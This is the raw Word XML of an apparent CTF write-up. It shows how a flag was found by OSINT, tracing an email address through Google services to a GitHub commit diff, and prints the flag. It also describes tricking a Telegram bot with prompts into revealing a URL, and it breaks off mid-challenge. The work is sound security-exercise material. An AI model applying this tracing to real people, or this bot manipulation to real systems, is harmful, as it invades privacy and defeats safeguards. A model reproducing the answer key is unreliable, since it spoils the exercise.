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A88709">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="212529"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="DEE2E6"/>
          <w:spacing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DEE2E6"/>
          <w:spacing w:val="20"/>
          <w:shd w:val="clear" w:fill="212529"/>
        </w:rPr>
        <w:t>Welcome Challenge - Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF564DF"/>
    <w:p w14:paraId="5369AC9C"/>
    <w:p w14:paraId="0705A8A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5523230"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="1" name="Picture 1" descr="Screenshot 2025-08-25 23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25 2346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9AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B4403A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204952BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78FFCDA9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From the challenge description, we are provided with an email address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A886598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suryanandanmajumber@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393A867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This is our first lead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03B363">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD9FD59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78928E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BAC1EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26145D41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0273CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3787EF72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A93F9C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr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Then i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> searched the email on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Epieos OSINT tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43292E62">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val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It showed the linked Google services including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google Maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google Calendar</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A Google Maps contributor profile was visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504B724">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C78C0B">
      <w:pPr>
        <w:pStyle w:val="10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02935" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot 2025-08-25 23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25 2351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115A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F5D43C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E4DDE7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val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Opening the Maps contributor profile revealed reviews posted by the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41666F5C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val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In one review at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khandala Ghat View Point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, I found a clue inside the text.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>It mentioned a GitHub repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9039C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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rStyle w:val="7"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/tuhin1729/tg-bot" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/tuhin1729/tg-bot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BAFA2">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D91B149">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5727700" cy="2879725"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot 2025-08-25 23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25 2355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6C38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B55A6AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B570617">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D679EA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4304D8AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7102243F">
      <w:pPr>
        <w:pStyle w:val="10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I opened the GitHub repo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC434A">
      <w:pPr>
        <w:pStyle w:val="10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Looking into the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> recent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> commits, I found an interesting commit where the code was updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10728B">
      <w:pPr>
        <w:pStyle w:val="10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 xml:space="preserve">In the diff view, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>original flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> was visible before being replaced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685FBB98">
      <w:pPr>
        <w:pStyle w:val="10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Flag discovered:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CloudSEK{Flag_1_w3lc0m3_70_7h3_c7f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCFA9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63506D2E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED013CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE76228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697855" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2025-08-25 23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25 235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16F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4F18C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A2166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCC52D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0D4D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB6DB80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B220B70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F60A98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D6F48A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02961B31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773BF530">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681A40F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E11011">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F042931">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550F2C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563EF778">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A229D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF387CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE298FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E964BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BC1881">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C89E9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550FA3B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AC874D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353767FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E21F3F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C82D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1901033A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="212529"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="sans-serif" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="DEE2E6"/>
          <w:spacing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DEE2E6"/>
          <w:spacing w:val="20"/>
          <w:shd w:val="clear" w:fill="212529"/>
        </w:rPr>
        <w:t>Hacking the Hacker - Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3C11E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491F9E3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3244AA51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3565CBAE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269230" cy="3455035"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12065"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot 2025-08-26 00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26 0012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0C95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17006ED1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79158FCE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We found the clue that we have to trick the telegram bot for the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E965B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FFCDB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4008F5F1"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523230" cy="2700020"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="8" name="Picture 8" descr="Screenshot 2025-08-26 00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26 0025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C8D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507D0417">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569AC920">
      <w:p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After sometime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prompting and tricking the bot, it eventually responded with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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</w:p>
    <w:p w14:paraId="1E29B855">
      <w:pPr>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3429000" cy="7258050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="9" name="Picture 9" descr="WhatsApp Image 2025-08-26 at 00.22.03_16f5b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8-26 at 00.22.03_16f5b8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03D7">
      <w:pPr>
        <w:jc w:val="center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05C565D1">
      <w:pPr>
        <w:jc w:val="center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6FFB3213">
      <w:pPr>
        <w:jc w:val="center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321C6708">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/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When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IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> I opened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the URL  it contained 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tw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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">o 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links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. I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IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> opened the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first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IN"/>
        </w:rPr>
        <w:t>one and found the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audio file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IN"/>
        </w:rPr>
        <w:t>.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IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F6996">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
